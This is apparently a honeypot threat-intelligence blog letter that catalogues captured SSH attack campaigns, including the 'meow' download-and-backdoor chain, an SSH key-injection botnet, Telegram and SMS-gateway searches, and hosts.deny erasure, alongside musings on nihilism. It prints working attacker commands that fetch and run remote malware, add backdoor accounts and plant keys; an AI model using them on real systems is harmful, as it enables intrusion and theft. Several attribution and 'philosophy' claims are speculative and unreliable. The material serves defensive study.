๐ŸŸข TI-2026-040E โ€” The Void Protocol: Malware as Philosophy, Surveillance as Architecture

Series: The Hidden Language | Letter 5 of 6+ | Published: 2026-06-23
Previous: 040D โ€” The Turkish Connection | Next: 040F โ€” The Food Code
Abstract: When attackers choose their weapons, they also choose their philosophy. This letter examines the tools left behind in our honeypot โ€” not just what they do, but what they mean. A password that names a shared library. A malware binary named after a cat's cry. A UUID that appears across 11 countries as a surveillance watermark. A single SSH key shared by 81 machines across 29 nations. These are not random technical artifacts. They are statements of intent, philosophical positions encoded in binary, and surveillance architectures that mirror the panopticon Jeremy Bentham designed in 1785 โ€” except this one has no walls.
224
MALWARE DOWNLOADS
4,031
COMMANDS CAPTURED
81
SSH KEY BOTNET IPs
46
TELEGRAM THIEVES
11
UUID TRACKER NODES
28
VOID PROTOCOL IPs

I. The Void as Weapon: Voidsetdownload.so

Of the 139,335 credentials captured by our honeypot, one stands alone in its philosophical precision. Twenty-eight IP addresses across 14 countries all attempt the same login:

Username: systemd Password: Voidsetdownload.so

Parse this carefully. The username is systemd โ€” the Linux init system, the first process that runs, PID 1, the god-process. The password is Voidsetdownload.so โ€” a shared object filename. The .so extension is a Linux shared library, the equivalent of a Windows DLL. This password names the payload.

๐Ÿ”ด CRITICAL FINDING: The credential IS the deployment instruction. systemd:Voidsetdownload.so tells the operator: "Authenticate as the init system, then download and inject the Void shared library." The password is not a password โ€” it is a command.

The geographic distribution reveals a coordinated network pretending to be chaos:

IP AddressCountryASNOrganizationThreat Score
103.131.144.53๐Ÿ‡ง๐Ÿ‡ฉ BD138362PLEXUS CLOUD (Md. Mobarak Hossain)92
31.59.89.180๐Ÿ‡ฎ๐Ÿ‡น IT203462NOVACONN SRL96
189.194.140.170๐Ÿ‡ฒ๐Ÿ‡ฝ MX13999Mega Cable S.A. de C.V.100
136.232.11.10๐Ÿ‡ฎ๐Ÿ‡ณ IN55836Reliance Jio Infocomm93
165.154.6.119๐Ÿ‡ญ๐Ÿ‡ฐ HK135377UCLOUD HK LIMITED95
87.106.65.126๐Ÿ‡ฌ๐Ÿ‡ง GB8560IONOS SE95
167.172.203.111๐Ÿ‡บ๐Ÿ‡ธ US14061DigitalOcean93
41.86.34.139๐Ÿ‡ธ๐Ÿ‡จ SC36958Cable & Wireless (Seychelles)94
69.49.246.176๐Ÿ‡บ๐Ÿ‡ธ US19871Newfold Digital (Network Solutions)94
34.123.134.194๐Ÿ‡บ๐Ÿ‡ธ US396982Google Cloud Platform73
173.249.52.138๐Ÿ‡ซ๐Ÿ‡ท FR51167Contabo GmbH91
155.4.245.222๐Ÿ‡ธ๐Ÿ‡ช SE8473Bahnhof AB76
81.211.72.167๐Ÿ‡ท๐Ÿ‡บ RU3216PJSC Vimpelcom (Beeline)78
103.189.208.13๐Ÿ‡ป๐Ÿ‡ณ VN149111TEDEV Technological Development78
177.43.83.43๐Ÿ‡ง๐Ÿ‡ท BR18881Telefรดnica Brasil S.A.90

Fourteen countries. Average threat score: 84.7. Mix of cloud providers (Google, DigitalOcean, UCloud, Contabo), residential ISPs (Reliance Jio, Mega Cable, Telefรดnica, Vimpelcom), and specialty hosting (Bahnhof โ€” Sweden's privacy-champion ISP). This is not a homogeneous botnet. This is a distributed deployment system testing whether the void payload is viable.

The Philosophy of .so

A .so file โ€” a shared object โ€” is the most intimate form of code injection. It doesn't run as a separate process. It becomes part of another process. Via LD_PRELOAD, a shared library can intercept any function call in any program: open(), read(), write(), connect(). It can make the system lie to itself.

The name "Void" is not accidental. In C programming, void means "nothing" โ€” a function that returns nothing, a pointer to nothing. In philosophy, the void is the abyss Nietzsche warned about:
"He who fights with monsters might take care lest he thereby become a monster. And if thou gaze long into an abyss, the abyss also gazes into thee."
โ€” Friedrich Nietzsche, Beyond Good and Evil, Aphorism 146

Voidsetdownload.so is a library of nothingness. Once injected, the host system's own processes become carriers. The void doesn't destroy โ€” it inhabits. It makes the system an extension of itself while the system believes it is running normally.

Additionally, three Linode/Akamai IPs (50.116.54.193, 66.175.212.125, 66.228.34.48) and one Storm Industries IP (176.65.139.103) attempt systemd:systemd โ€” the identity credential. They are probing whether the init system has a login at all, testing the attack surface before deploying the void.

II. The Meow Protocol: Google Cloud vs. Google Cloud

On our honeypot, a single IP address executed one of the most complete attack chains we have ever recorded:

FROM: 35.196.255.242 (Google Cloud Platform, US, AS396982) echo 'toor' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew'
๐Ÿ”ด CRITICAL: The attacker (35.196.255.242) is on Google Cloud. The malware server (35.237.91.38) is on Google Cloud. Google is hosting both the attacker and the arsenal. Both IPs are in the same AS396982 โ€” possibly the same billing account.

Anatomizing the Meow

Every line of this command is a lesson in attack methodology:

ComponentCommandPurpose
Privilege escalationecho 'toor' | sudo -SUses reversed "root" as sudo password โ€” implies prior compromise
Resource preparationulimit -n 1020000Sets file descriptors to 1M+ โ€” preparing for DDoS or mass scanning
Cleanuprm -rf meow*Removes any previous meow binaries โ€” avoids detection by version conflict
Dual downloadwget + curlRedundancy โ€” if wget isn't installed, curl is tried
Multi-archmeow + meowarm64x86_64 and ARM64 โ€” targets both servers AND IoT devices
Persistencechmod 777; ./meowWorld-executable, immediate execution
Backdoor usersadmin1:modzmodz, user1:modzmodzCreates two backdoor accounts with sudo access
Password change$(whoami):modzmodzChanges current user's password to attacker's password
Beaconecho -n $(whoami):toor > /tmp/mewWrites credential confirmation to disk โ€” C2 can verify success

The password modzmodz is a gaming/modding community term โ€” "mods" repeated. The attacker's credential attempts on our honeypot confirm this is automated:

Meow attacker credentials (35.196.255.242):
admin:admin, administrator:administrator, root:admin123, root:master, root:raspberry,
root:root, root:server, root:toor, root:webmaster, ui:ui

root:raspberry targets Raspberry Pi devices. ui:ui targets web interfaces. root:toor matches the sudo password used in the attack chain. This is an IoT worm with server ambitions.

The Meowton Connection

Our OSINT library (URLhaus data, indexed June 2026) reveals a Mirai variant called meowton:

http://162.248.101.153/n2/asusrt โ€” tagged: botnet, mirai โ€” reporter: meowton
http://162.248.101.153/n2/mips64 โ€” tagged: botnet, mirai โ€” reporter: meowton

"Asusrt" โ€” targeting ASUS routers. "mips64" โ€” MIPS architecture common in consumer routers and embedded devices. The "meow" malware on our honeypot and the "meowton" Mirai variant documented publicly likely share lineage. Meow is what a cat says before it pounces.

III. The UUID Panopticon: One Identifier, Eleven Nations

Eleven IP addresses across six countries execute the exact same command on our honeypot:

HISTZISE=10000; HISTFILE=~/.bash_history; HISTTIMEFORMAT=' d2ae636d-7d32-4072-a7aa-3a885d8bdd32 '; history -r $HISTFILE; history

This command does something profoundly invasive. It:

  1. Sets bash history size to 10,000 entries (captures everything)
  2. Points to the user's actual bash history file
  3. Sets a UUID watermark as the timestamp format โ€” every history entry will be prefixed with d2ae636d-7d32-4072-a7aa-3a885d8bdd32
  4. Reloads and displays the entire history
๐Ÿ”ด CRITICAL: This is not an attack. This is intelligence collection. The operator reads the victim's entire command history to determine:
  • What software is installed
  • What services are running
  • What other attackers have been here before
  • What the machine is used for
  • Whether it's worth further exploitation
The UUID serves as a campaign identifier โ€” when the data arrives at the C2 server, this UUID tags which reconnaissance operation collected it.

Note the deliberate typo: HISTZISE instead of HISTSIZE. This means the history size setting doesn't actually work โ€” but it doesn't matter. The real payload is the history -r; history sequence that dumps existing history.

The Strong Technology Web

The 11 UUID tracker IPs reveal a single operator behind multiple shell companies:

IPCountryASNOrganizationHits
176.67.80.217๐Ÿ‡ณ๐Ÿ‡ฑ NL62240Clouvider Limited (GB)38
176.67.80.8๐Ÿ‡ณ๐Ÿ‡ฑ NL62240Clouvider Limited (GB)4
176.67.80.31๐Ÿ‡บ๐Ÿ‡ธ US62240Clouvider Limited (GB)1
176.67.87.50๐Ÿ‡ธ๐Ÿ‡ฐ SK62651NETPROTECT-DP / Strong Technology, LLC1
216.131.105.94๐Ÿ‡ง๐Ÿ‡ช BE62651NETPROTECT-DP / Strong Technology, LLC1
216.131.120.66๐Ÿ‡บ๐Ÿ‡ธ US22781STRTEC / Strong Technology, LLC1
216.131.111.78๐Ÿ‡ฉ๐Ÿ‡ช DE212238CDNEXT / Datacamp Limited (GB)1
216.151.183.19๐Ÿ‡ต๐Ÿ‡ฑ PL140952STL-AS-AP / Strong Technology, LLC1
64.145.94.92๐Ÿ‡บ๐Ÿ‡ธ US62651NETPROTECT-DP / Strong Technology, LLC1
36.255.204.165๐Ÿ‡ญ๐Ÿ‡ฐ HK62651NETPROTECT-DP / Strong Technology, LLC1
185.228.105.149๐Ÿ‡บ๐Ÿ‡ฆ UA6876TENET Scientific Production Enterprise4
โš ๏ธ PATTERN: Strong Technology, LLC (US-registered) operates under at least four different ASN numbers:
  • AS62651 (NETPROTECT-DP) โ€” Slovakia, Belgium, US, Hong Kong
  • AS22781 (STRTEC) โ€” United States
  • AS140952 (STL-AS-AP) โ€” Poland
  • AS212238 (CDNEXT / Datacamp) โ€” Germany
One company. Four AS numbers. Six countries. One UUID. This is not infrastructure diversity โ€” this is identity laundering.

The remaining IP (185.228.105.149) belongs to TENET โ€” a Ukrainian scientific/educational network. TENET is a legitimate ISP serving Ukrainian academic institutions. Its presence in this UUID cluster suggests either a compromised node or a cooperative relationship.

Bentham's Digital Panopticon

"As early as 1785, social theorist Jeremy Bentham introduced the concept of the 'panopticon,' an all-observing prison house in which the prisoners themselves are unable to tell whether they are being watched at any given time. This concept was expanded upon by French philosopher Michel Foucault..."
โ€” From our OSINT library: surveillance theory documentation

The UUID tracker IS a digital panopticon. The victim cannot see the watcher. The watcher sees everything. And the UUID ensures that every piece of collected intelligence is attributable to a specific campaign โ€” enabling correlation across targets, exactly as the NSA's metadata collection programs operated:

"At least 80 percent of fibre-optic cables globally go via the US. This is no accident and allows the US to view all communications coming in."
โ€” William Binney, former NSA Technical Director (from our OSINT library: Snowden documents)

IV. One Key to Rule Them All: The SSH Skeleton Key

Eighty-one IP addresses from twenty-nine countries inject the exact same SSH public key into every system they compromise:

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv..." >> .ssh/authorized_keys && chmod 700 .ssh && chmod 600 .ssh/authorized_keys

And before the injection, they first remove any protections:

cd ~; chattr -ia .ssh; lockr -ia .ssh

The chattr -ia removes immutable and append-only flags โ€” meaning even if an administrator locked the .ssh directory, this command unlocks it. The sequence is: unlock โ†’ destroy โ†’ recreate โ†’ inject โ†’ lock.

๐Ÿ”ด CRITICAL: 81 machines across 29 countries share ONE private key. Whoever holds that private key has permanent root access to every system this botnet has ever successfully compromised. This is a skeleton key โ€” one credential that opens every door.

Geographic Distribution

29 countries, 81 IPs โ€” SSH key botnet footprint:

๐Ÿ‡บ๐Ÿ‡ธ US: 11 | ๐Ÿ‡ธ๐Ÿ‡ฌ SG: 8 | ๐Ÿ‡ฐ๐Ÿ‡ท KR: 8 | ๐Ÿ‡ฎ๐Ÿ‡ฉ ID: 7 | ๐Ÿ‡ญ๐Ÿ‡ฐ HK: 6 | ๐Ÿ‡ง๐Ÿ‡ท BR: 5 | ๐Ÿ‡ป๐Ÿ‡ณ VN: 5 | ๐Ÿ‡ฉ๐Ÿ‡ช DE: 3 | ๐Ÿ‡ณ๐Ÿ‡ฌ NG: 3 | ๐Ÿ‡ป๐Ÿ‡ช VE: 2 | ๐Ÿ‡ท๐Ÿ‡บ RU: 2 | ๐Ÿ‡ฉ๐Ÿ‡ด DO: 2 | ๐Ÿ‡ณ๐Ÿ‡ฑ NL: 2 | ๐Ÿ‡ฎ๐Ÿ‡ณ IN: 2 | ๐Ÿ‡จ๐Ÿ‡ฆ CA: 1 | ๐Ÿ‡ต๐Ÿ‡ฐ PK: 1 | ๐Ÿ‡ต๐Ÿ‡ช PE: 1 | ๐Ÿ‡ฒ๐Ÿ‡ฐ MK: 1 | ๐Ÿ‡ช๐Ÿ‡ฌ EG: 1 | ๐Ÿ‡ช๐Ÿ‡ธ ES: 1 | ๐Ÿ‡น๐Ÿ‡ฟ TZ: 1 | ๐Ÿ‡ง๐Ÿ‡ฉ BD: 1 | ๐Ÿ‡ฒ๐Ÿ‡ฆ MA: 1 | ๐Ÿ‡ซ๐Ÿ‡ท FR: 1 | ๐Ÿ‡ฌ๐Ÿ‡ง GB: 1 | ๐Ÿ‡ฆ๐Ÿ‡ช AE: 1 | ๐Ÿ‡ช๐Ÿ‡ช EE: 1 | ๐Ÿ‡ฒ๐Ÿ‡ด MO: 1 | ๐Ÿ‡ฐ๐Ÿ‡ฟ KZ: 1

The hosting infrastructure reveals the operator's procurement strategy:

ProviderCountType
DigitalOcean6Cloud VPS
Microsoft Azure6Enterprise Cloud
SK Broadband (Korea)5Consumer ISP
UCloud HK3Cloud (Hong Kong)
KIXS (Korea)3Korean ISP
Tencent Cloud3Chinese Cloud
Oracle/OCI2Enterprise Cloud
BytePlus (TikTok infra)2Cloud

DigitalOcean and Microsoft tied at 6 IPs each. Oracle, Tencent, and BytePlus (the international arm of ByteDance/TikTok) also represented. This botnet runs on the world's most reputable cloud platforms. It also runs on Korean consumer broadband (SK Broadband: 5 IPs, KIXS: 3 IPs), Indonesian hosting, and Brazilian ISPs.

The same 81 IPs also execute comprehensive system profiling: CPU model, RAM, disk space, crontab listing, process enumeration. They don't just plant a key โ€” they inventory the entire machine.

V. The Triple Harvest: Telegram, SMS, and MikroTik

Forty-six IP addresses execute an identical multi-stage reconnaissance command that searches for three entirely different types of infrastructure simultaneously:

ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

This single command searches for:

Target 1: Telegram Desktop Session Data

~/.local/share/TelegramDesktop/tdata โ€” Contains Telegram's session keys. With this directory, an attacker can clone a Telegram account without the password or 2FA. They become you.

Target 2: SMS Gateway Hardware

/dev/ttyGSM*, /dev/ttyUSB-mod*, /usr/bin/qmuxd, /var/qmux_connect_socket โ€” These are GSM modem devices, USB modems, and the Qualcomm modem management daemon. The attacker is checking whether this Linux system has physical cellular hardware โ€” can it send SMS messages?

Target 3: MikroTik RouterOS

The same 46 IPs also run: /ip cloud print โ€” a MikroTik RouterOS command. They're testing whether the system is actually a MikroTik router.

โš ๏ธ IMPLICATIONS: This triple search reveals the operator's hierarchy of value:
  1. Telegram sessions = intelligence (read private messages, group chats, channels)
  2. SMS gateways = weaponization (send phishing SMS, intercept 2FA codes, SIM-based fraud)
  3. MikroTik routers = infrastructure expansion (compromised routers become VPN endpoints, traffic interception points)

The Korean Cluster

South Korea dominates with 12 of 46 IPs (26%), almost all on KIXS-AS-KR (AS38900, 10 IPs). This single Korean ISP accounts for 22% of all Telegram/SMS theft activity. Sweden follows with 6 IPs, then US (4), Vietnam (3), Russia (3).

Full country distribution (46 IPs):
๐Ÿ‡ฐ๐Ÿ‡ท KR: 12 | ๐Ÿ‡ธ๐Ÿ‡ช SE: 6 | ๐Ÿ‡บ๐Ÿ‡ธ US: 4 | ๐Ÿ‡ป๐Ÿ‡ณ VN: 3 | ๐Ÿ‡ท๐Ÿ‡บ RU: 3 | ๐Ÿ‡น๐Ÿ‡ญ TH: 2 | ๐Ÿ‡ป๐Ÿ‡ช VE: 1 | ๐Ÿ‡ซ๐Ÿ‡ท FR: 1 | ๐Ÿ‡ต๐Ÿ‡ฑ PL: 1 | ๐Ÿ‡ฒ๐Ÿ‡ฉ MD: 1 | ๐Ÿ‡จ๐Ÿ‡ญ CH: 1 | ๐Ÿ‡ฌ๐Ÿ‡ต GP: 1 | ๐Ÿ‡ญ๐Ÿ‡ฐ HK: 1 | ๐Ÿ‡บ๐Ÿ‡ฟ UZ: 1 | ๐Ÿ‡ฎ๐Ÿ‡ณ IN: 1 | ๐Ÿ‡ฆ๐Ÿ‡ฑ AL: 1 | ๐Ÿ‡น๐Ÿ‡ผ TW: 1 | ๐Ÿ‡ฐ๐Ÿ‡ฟ KZ: 1 | ๐Ÿ‡ฎ๐Ÿ‡น IT: 1 | ๐Ÿ‡จ๐Ÿ‡ฟ CZ: 1 | ๐Ÿ‡ฆ๐Ÿ‡ฒ AM: 1 | ๐Ÿ‡ฒ๐Ÿ‡ฝ MX: 1

Korea-Sweden is an unusual pairing. Sweden's 6 IPs include Bahnhof AB (Sweden's most privacy-focused ISP, known for housing WikiLeaks servers) and Telenor Sweden. The Korean dominance through a single ISP suggests either a compromised infrastructure cluster within KIXS or an operator with preferential access to Korean broadband.

VI. The Whisper from Latvia: IoT Malware Factory

A single Latvian IP address (31.170.22.205, Sia Nano IT, AS42099) serves as a malware distribution server, delivering multiple binaries to our honeypot:

URLSHA256Architecture
http://31.170.22.205/bins/whisper.armv558189cbd4e6dc0c7...ARM v5 (IoT)
http://31.170.22.205/bins/whisper.armv658189cbd4e6dc0c7...ARM v6 (Raspberry Pi)
http://31.170.22.205/dl600d5ecab0f13eb33cf...Unknown

The /bins/ directory structure and multi-architecture binaries are hallmarks of Mirai variants. The name "whisper" is the operational antonym of "shout" โ€” this malware is designed to be quiet, to take IoT devices without alerting anyone. The delivery mechanism confirms this:

cd /tmp || cd /var/run || cd /dev busybox wget http://31.170.22.205/dl600

busybox wget โ€” uses the embedded version of wget found on IoT devices, not the full Linux version. The fallback path /tmp || /var/run || /dev tries three directories that are writable even on read-only filesystems. This is a weapon designed for routers, cameras, DVRs, and smart devices.

The same SHA256 hash (58189cbd...) for both armv5 and armv6 is unusual โ€” it means the binary is either cross-compiled for both or the architecture detection is done at runtime. Either way, it's a single payload designed to infect the widest possible range of ARM devices.

VII. "Notwork" Monitoring: The Anti-Network

A single IP address โ€” 193.31.31.234 (SPARKED HOST LLC, AS397032, US) โ€” downloads a file called notwork-monitoring four times to our honeypot. The name itself is the tell: notwork, not network. The opposite of monitoring โ€” or monitoring designed to not work, or monitoring that makes networks not work.

The commands this IP executes reveal its reconnaissance sophistication:

uname -s && test -d /etc/systemd/system && echo systemd_ok && sudo -n id 2>/dev/null | grep root && echo sudo_ok uname -sm && test -d /etc/systemd/system && echo systemd_ok; id -u; sudo -n true 2>/dev/null && echo sudo_ok || true uname -m && df / >/dev/null 2>&1 && which systemctl && echo GOOD

Three variants of the same probe. Each asks: What OS? Is systemd present? Do I have sudo? What architecture? The output is a single word: systemd_ok, sudo_ok, GOOD. This is designed for automated parsing โ€” the C2 reads one word and decides whether to deploy. notwork-monitoring is the payload that follows a successful probe.

VIII. BMOK: 278 Echoes from the Void

A single IP address โ€” 103.24.212.42 โ€” sends the command echo BMOK to our honeypot 278 times. Nothing else. Just BMOK, over and over.

103.24.212.42 โ€” Indonesia, PT Adau Putra Network (AS132649)
Honeypot hits: 364 | Threat score: 79

"BMOK" is not a standard Linux command, not a known protocol, not a dictionary word. 278 repetitions from a single source means one of two things:

  1. Heartbeat/beacon: The command tests whether a compromised system is still responsive. If echo BMOK returns "BMOK", the shell is alive. If it returns nothing, the session is dead. 278 repetitions = 278 keep-alive checks.
  2. C2 trigger word: On a truly compromised system with a rootkit listening, "BMOK" could trigger a specific action โ€” data exfiltration, payload download, or lateral movement. The rootkit intercepts the echo and acts on the keyword.

364 total honeypot hits from this IP. 278 of them are just "echo BMOK". This machine's purpose is singular: check whether the doors are still open.

IX. The 56 Who Erase the Blacklist

Fifty-six unique IP addresses execute an identical cleanup command:

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; echo > /etc/hosts.deny;

This command does three things:

  1. Removes secure.sh and auth.sh โ€” these are other attackers' persistence scripts
  2. Empties /etc/hosts.deny โ€” removes ALL IP-based blacklists
  3. Clears the way for their own access
โš ๏ธ TURF WAR: This is botnet vs. botnet. The 56 IPs don't just want to access the system โ€” they want to evict the previous occupants. Removing hosts.deny means any IP that was banned can now reconnect. Removing secure.sh and auth.sh kills competing botnets' monitoring scripts. This is digital territorial warfare.

This pattern is common enough to be a standard module in the attack toolkit. 56 IPs across many countries, all running the same script โ€” not hand-typed, but deployed as part of a worm's post-exploitation phase.

X. The Directory Tester: OMEGATECH's Handshake

130 commands from 7 IPs โ€” but only two operators: Scaleway (51.15.4.95, Netherlands) and OMEGATECH (91.92.240.199, 91.92.243.116, 178.16.52.166) โ€” the same OMEGATECH from 040A.

(for d in "$HOME" /var/tmp /tmp /dev/shm; do f="$d/.x$$.sh" echo 'echo 0' > "$f" 2>/dev/null && chmod +x "$f" 2>/dev/null && [ "$("$f" 2>/dev/null)" = "0" ] && /bin/rm -rf "$f" && exit 0 /bin/rm -rf "$f" done; exit 1) && echo 0 || echo 1

This is a writable directory scanner. It tests four locations ($HOME, /var/tmp, /tmp, /dev/shm), writes a test script, executes it, and reports whether writing + execution succeeded. Exit 0 = "I can deploy here". Exit 1 = "nowhere writable".

OMEGATECH (AS202412, Seychelles-registered, documented in 040A) uses this as a pre-deployment probe. Their Turkish IP (178.16.52.166) and German/Dutch IPs (91.92.240.199, 91.92.243.116) all run the identical script. This is OMEGATECH's standard handshake: test the ground before deploying the weapon.

XI. Download Archaeology: 224 Malware Samples

Our honeypot captured 224 download attempts. The majority (164) had empty URLs โ€” probes that tested download capability without delivering payloads. The remainder reveals a malware ecosystem:

CategoryDownloadsSourceNotable
SSH session clone (sshd)3633 IPsLegitimate binary name used as cover
Neofetch81 IP (via GitHub)System profiling tool โ€” not malware, but reconnaissance
Whisper IoT botnet5Latvia (31.170.22.205)Multi-arch ARM malware
Notwork-monitoring4SPARKED HOST (US)Persistent service installer
HTTP requests3Varioushttp://202.155.10.112/shr, ipinfo.io, ifconfig.me
Meow malware2Google Cloudx86_64 + ARM64 DDoS bot

The Cloud Paradox

Among the 224 download sources, we find the world's largest cloud providers:

Cloud providers serving malware or hosting attackers:
  • Google Cloud (AS396982): 35.196.255.242 (attacker), 35.237.91.38 (meow host), 35.237.94.18, 34.85.232.35
  • Microsoft Azure (AS8075): 4.157.250.195, 4.182.219.135, 20.13.147.55, 20.193.141.133
  • Amazon AWS (AS16509): 54.176.104.45
  • Tencent Cloud (AS132203): 43.133.60.217 (Singapore), 43.153.41.82 (US)
  • Alibaba Cloud (AS45102): 47.237.124.1

Every major hyperscaler is represented. The most "trusted" infrastructure in the world โ€” the cloud platforms that host banking, healthcare, government services โ€” simultaneously hosts the attack infrastructure targeting everyone else.

XII. The Philosophy of Nothing: When Infrastructure Names Its Own Nihilism

Our OSINT library contains extensive philosophical documentation on nihilism, void, and the abyss. These are not abstract musings โ€” they are the philosophical foundations that attackers are (consciously or not) encoding into their tools:

"Nothing better characterizes failure in the crucial test, the negative result of the nihilistic experience, than the sentiment expressed by Sartre in these words: 'We are condemned to be free.' Man takes absolute freedom for himself, but he can only feel this freedom as a condemnation."
โ€” From our OSINT library: existentialist philosophy texts
"If reason is incapable of deducing ultimate, nonarbitrary human ends, and nothing can be judged as ultimately more important than anything else, then freedom is equal to slavery; cruelty is equal to kindness; love is equal to hate; war is equal to peace; dignity is equal to contempt; destruction is equal to creation."
โ€” From our OSINT library: nihilist philosophy documentation

Consider the names: Voidsetdownload. Meow (the cry of an animal, not a word โ€” pre-linguistic). Whisper (barely audible). Ghost (not present). Shadow (absence of light). Phantom (an illusion).

These names cluster around negation. They name what is not: not-present (ghost), not-visible (shadow), not-loud (whisper), not-real (phantom), not-anything (void). The attackers don't name their tools after what they do โ€” they name them after what they aren't. After nothing.

This is not coincidence. This is the nihilist position encoded in binary: nothing matters, therefore everything is permitted. The void doesn't destroy because it hates. It destroys because it has no reason not to.

Nietzsche saw this coming:

"Nietzsche showed that the point at which one realizes that 'God is dead,' that the whole world of 'spirit,' of good and evil, is only an illusion, and that the only true world is that which was negated or rejected in the name of the former, is the crux of a decisive test. 'The weak shatter, the strong...'"
โ€” From our OSINT library: Nietzsche analysis

The infrastructure shatters or it endures. The void tests whether the door is locked. If it isn't, the void enters. Not with malice โ€” with indifference. And indifference, it turns out, is more dangerous than hatred, because hatred at least acknowledges the existence of the other.

XIII. The Void Map: All Protocols, All Nations

Attack Protocol Distribution

ProtocolIPsCommands/CredsCountriesPhilosophy
SSH Skeleton Key8185 injections29Permanence โ€” one key, all doors
hosts.deny Erasure5660 commandsManyErasure โ€” remove all defenses
Telegram/SMS/MikroTik46Triple harvest22Surveillance โ€” read everything
Voidsetdownload.so2828 credentials14Void โ€” become the system
UUID Panopticon11History dump6Intelligence โ€” know everything
Writable Dir Scanner7130 probes3Preparation โ€” find where to land
Meow Malware1Full chain1Chaos โ€” DDoS + persistence
Whisper IoT15 downloads1Silence โ€” take without sound
Notwork14 probes1Anti-network โ€” infrastructure against itself
BMOK1278 echoes1Repetition โ€” the void checks if you're still alive

Total unique IPs across all void protocols: 232+. Total countries: 50+. Every continent except Antarctica. And these are just the ones we caught โ€” one honeypot, one IP address, listening for four months. The actual void is orders of magnitude larger.

XIV. The Abyss Responds

This letter began with a password: Voidsetdownload.so. It ends with a realization: the void is not a metaphor. It is an architectural principle.

Every protocol we documented follows the same logic:

  • Void enters through the init system (PID 1) โ€” it starts at the beginning
  • Meow prepares for a million connections โ€” it scales to infinity
  • UUID reads your history โ€” it knows your past
  • SSH key replaces your identity โ€” it becomes your future
  • Telegram theft reads your messages โ€” it knows your present
  • Whisper takes your IoT โ€” it occupies your physical space
  • hosts.deny erasure removes your defenses โ€” it opens all doors
  • BMOK checks if you're alive โ€” it watches you exist

Past, present, future, physical space, all doors, all connections, the very identity of the machine โ€” the void protocol is total. It doesn't want your data. It doesn't want your CPU cycles. It wants everything. It wants to be you.

And the platforms that could stop this โ€” Google, Microsoft, Amazon, Tencent, Alibaba โ€” are simultaneously the platforms that host it. The void lives in the cloud. The cloud is the void.

"The methodology is honesty to the point of absurdity; honesty without mercy; honesty unprejudiced by morals, aesthetics, faith, or hope. When all illusions have been dispelled, at the end of overcoming..."
โ€” From our OSINT library: nihilist philosophy

We gazed into the abyss of our honeypot data. The abyss โ€” 232 IP addresses strong, spanning 50 countries, armed with skeleton keys and session stealers and malware named after cats โ€” gazed back.

It said: BMOK.

โš  Personal capacity. Research published independently โ€” not reflecting employer views. Derived from passive observation of attacks against personal infrastructure. Full disclaimer โ†’
โ† Previous The Hidden Language โ€” 5 / 6 Next โ†’